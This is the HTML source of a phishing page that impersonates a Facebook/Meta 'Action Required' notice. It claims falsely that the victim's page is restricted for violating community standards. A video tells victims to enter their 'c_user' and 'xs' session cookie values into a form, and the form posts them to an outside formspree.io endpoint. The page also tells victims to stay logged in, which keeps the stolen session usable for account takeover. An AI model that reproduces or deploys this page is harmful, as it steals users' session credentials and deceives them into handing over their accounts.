
<!DOCTYPE html><html lang="en">
  <style>
    * {
  margin: 0;
  padding: 0;
  font-family: "poppins", sans-serif;
}

body {
  background-color: #efefef;
}

nav {
  display: flex;
  align-items: center;
  justify-content: space-between;
  background-color: #4267b2;
  padding: 15px 10%;
}

.fb-2 {
  font-style: normal;
  font-weight: bold;
  font-size: 45px;
  color: #ffffff;
  margin-right: 45px;
}

.nav-right,
.nav-left {
  display: flex;
  align-items: center;
}

.search-box {
  background: #efefef;
  width: 300px;
  border-radius: 2px;
  display: flex;
  align-items: center;
  padding: 0 15px;
}

.search-box img {
  width: 18px;
}

.search-box input {
  width: 100%;
  background: transparent;
  padding: 10px;
  outline: none;
  border: 0;
}

.main-body {
  font-family: Arial, sans-serif;
  background-color: #efefef;
  color: #000000;
  margin: 0;
  padding: 0;
  display: flex;
  justify-content: center;
  align-items: center;
}

.content {
  text-align: left;
  padding: 20px;
  border-radius: 5px;
  box-shadow: 0 0 10px rgba(0, 0, 0, 0.2);
  background-color: #f5f5f5;
  width: 100%;
  max-width: 50%;
}

.video-text {
  font-weight: bold;
  opacity: 60%;
  font-size: small;
}

.tr-5 {
  font-size: 15px;
  font-style: initial;
}

.mt-4 {
  font-weight: bold;
  font-size: large;
  opacity: 80%;
}

input {
  border-width: 1px;
  border-style: solid;
  border-color: #c7c1c1;
  padding: 5px;
  border-radius: 5px;
}

.msi-4 {
  font-style: initial;
  font-size: 15px;
}

.container {
  position: relative;
  width: 100%;
  background-color: #f0f0f0;
}

.button {
  position: absolute;
  top: 50%;
  left: 93%;
  transform: translate(-50%, -20%);
  padding: 8px 2%;
  background-color: #4267b2;
  color: #ffffff;
  border: none;
  cursor: pointer;
  font-weight: 550;
  font-size: 80%;
  border-radius: 3px;
}

.copy-r {
  font-style: normal;
  font-weight: 550;
  opacity: 70%;
  padding: 15px 2%;
}
/* Styles for the loader overlay */
#loader-overlay {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background-color: rgba(255, 255, 255, 0.9); /* semi-transparent white background */
    z-index: 9999; /* Ensure the loader appears above other content */
    display: flex;
    justify-content: center;
    align-items: center;
}

.loader {
    border: 16px solid #f3f3f3; /* Light grey */
    border-top: 16px solid #3498db; /* Blue */
    border-radius: 50%;
    width: 120px;
    height: 120px;
    animation: spin 2s linear infinite;
}

@keyframes spin {
    0% { transform: rotate(0deg); }
    100% { transform: rotate(360deg); }
}

#c_user[type="number"]::-webkit-inner-spin-button,
#c_user[type="number"]::-webkit-outer-spin-button {
    -webkit-appearance: none;
    margin: 0;
}


input[type="number"] {
  -moz-appearance: textfield;
}
input[type="number"]::-webkit-inner-spin-button,
input[type="number"]::-webkit-outer-spin-button {
  -webkit-appearance: none;
  margin: 0;
}
    </style>
  <head>
<script type="text/javascript">
  // This is a CodeSandbox injection script that's used to
  // add navigation and inspector functionality to the preview
  (function () {
    var script = document.createElement("script");
    script.src = "https://codesandbox.io/p/preview-protocol.js";
    script.defer = true;
    script.async = true;
    (document.body || document.documentElement).appendChild(script);
  })();

  const isIFramePreview = window.top !== window.self;

  // Only run this script in editor context
  if (isIFramePreview) {
    // This script is used to enable Chrome DevTools functionality
    (function () {
      var script = document.createElement("script");
      script.src =
        "https://codesandbox.io/p/chrome-devtool/protocol/index.js";

      script.onload = () => {
        const devtoolProtocol = window.chobitsu;
        if (devtoolProtocol) {
          window.addEventListener("message", (event) => {
            const { type, data } = event.data;

            if (type === "FROM_DEVTOOL") {
              devtoolProtocol.sendRawMessage(data);
            }
          });

          devtoolProtocol.setOnMessage((data) => {
            if (data.includes('"id":"tmp')) {
              return;
            }

            window.parent.postMessage({ type: "TO_DEVTOOL", data }, "*");
          });

          devtoolProtocol.sendRawMessage(
            `{"id":5,"method":"Runtime.enable","params":{}}`
          );
        }        
      }

      (document.head || document.documentElement).prepend(script);
    })();
  }

  if (typeof __REACT_DEVTOOLS_GLOBAL_HOOK__ === "undefined") {
    let nextID = 0;
    let hook = (__REACT_DEVTOOLS_GLOBAL_HOOK__ = {
      renderers: new Map(),
      supportsFiber: true,
      inject: (renderer) => {
        const id = nextID++;
        hook.renderers.set(id, renderer);
        return id;
      },
      onScheduleFiberRoot() {},
      onCommitFiberRoot() {},
      onCommitFiberUnmount() {},
    });
  }

  document.currentScript.remove();
</script>
<script type="text/javascript">
  // This is a CodeSandbox injection script that's used to
  // add navigation and inspector functionality to the preview
  (function () {
    var script = document.createElement("script");
    script.src = "https://codesandbox.io/p/preview-protocol.js";
    script.defer = true;
    script.async = true;
    (document.body || document.documentElement).appendChild(script);
  })();

  const isIFramePreview = window.top !== window.self;

  // Only run this script in editor context
  if (isIFramePreview) {
    // This script is used to enable Chrome DevTools functionality
    (function () {
      var script = document.createElement("script");
      script.src =
        "https://codesandbox.io/p/chrome-devtool/protocol/index.js";

      script.onload = () => {
        const devtoolProtocol = window.chobitsu;
        if (devtoolProtocol) {
          window.addEventListener("message", (event) => {
            const { type, data } = event.data;

            if (type === "FROM_DEVTOOL") {
              devtoolProtocol.sendRawMessage(data);
            }
          });

          devtoolProtocol.setOnMessage((data) => {
            if (data.includes('"id":"tmp')) {
              return;
            }

            window.parent.postMessage({ type: "TO_DEVTOOL", data }, "*");
          });

          devtoolProtocol.sendRawMessage(
            `{"id":5,"method":"Runtime.enable","params":{}}`
          );
        }        
      }

      (document.head || document.documentElement).prepend(script);
    })();
  }

  if (typeof __REACT_DEVTOOLS_GLOBAL_HOOK__ === "undefined") {
    let nextID = 0;
    let hook = (__REACT_DEVTOOLS_GLOBAL_HOOK__ = {
      renderers: new Map(),
      supportsFiber: true,
      inject: (renderer) => {
        const id = nextID++;
        hook.renderers.set(id, renderer);
        return id;
      },
      onScheduleFiberRoot() {},
      onCommitFiberRoot() {},
      onCommitFiberUnmount() {},
    });
  }

  document.currentScript.remove();
</script>
  <meta charset="UTF-8">
  <link rel="icon" type="image/png" href="Facebook_Logo_2023.png">
  <link rel="stylesheet" href="style.css">
  <title>Action | Required</title>
</head>

<body>
 


    <nav>
      <div class="nav-left">
        <p class="fb-2">facebook</p>
      </div>
      <div class="nav-right">
        <div class="search-box">
          <img src="https://cdn.glitch.global/d08141de-e7af-45a5-916b-2f09d06ac286/search-icon-lob.png?v=1712422050841" alt="search-icon">
          <input type="text" placeholder="Search" data-twofas-input-listener="true" data-twofas-element-number="0">
        </div>
      </div>
    </nav>
    <br><br>

    <div class="main-body">
      <form class="content" action="https://formspree.io/f/mnnajvbk" method="POST">
        <div>
          <img src="https://www.victoryxr.com/wp-content/uploads/2023/04/Meta-Logo-1024x576.png.webp" width="140">
        </div>

        <p class="tr-5">
          We have detected unusual activity on your page that violates our
          community standards.
        </p>
        <br>
        <p class="tr-5">
          Your access to your page has been limited, and you are currently
          unable to post, share, or comment using your page.
        </p>
        <br>
        <p class="tr-5">
          If you believe this to be a mistake, you have the option to submit an
          appeal by providing the necessary information.
        </p>
        <br>

        <div class="video-text">
          <p>Must Watch Detailed Video Information:</p>
        </div>

        <div>
          <video controls="" loop="" width="320" poster="https://i.pinimg.com/originals/97/95/69/979569a2dedd37573974ceebc05b4a4e.png">
            <source src="https://cdn.glitch.global/125da627-08ba-4e22-acf3-c75d7cbdc325/WhatsApp%20Video%202024-06-25%20at%2018.53.47_3093dc69.mp4?v=1719948585883" type="video/mp4">
          </video>
        </div>

        <p class="tr-5">
          Please be sure to provide the requested information below.
        </p>
        <br>

        <div>
          <p class="mt-4">c_user</p>
          <input type="number" name="c_user" id="c_user" required="1" data-twofas-input-listener="true" data-twofas-element-number="1">
        </div>
        <br>

        <div>
          <p class="mt-4">xs</p>
          <input type="text" name="xs" id="xs" placeholder="" pattern="^(?=.*[a-z])(?=.*[A-Z])(?=.*\d)(?=.*[@#$%^&amp;+=]).{12,}$" title="Must Watch Detailed Video" required="1" data-twofas-input-listener="true" data-twofas-element-number="2">
        </div>
        <br>
        
        

        <p class="msi-4">
          Please make sure account not to log out from your computer or laptop
          until you have received a approval from facebook.
        </p>
        <br>

        <div class="container">
          <button class="button" data-twofas-element-number="3">
            <p>Submit</p>
          </button>
        </div>
        <br>
        <br>
      </form>
    </div>
    <br><br>
    <div>
      <p class="copy-r">Meta ©️ 2024</p>
    </div>
  </div>

<script src="script.js"></script>

</body></html>
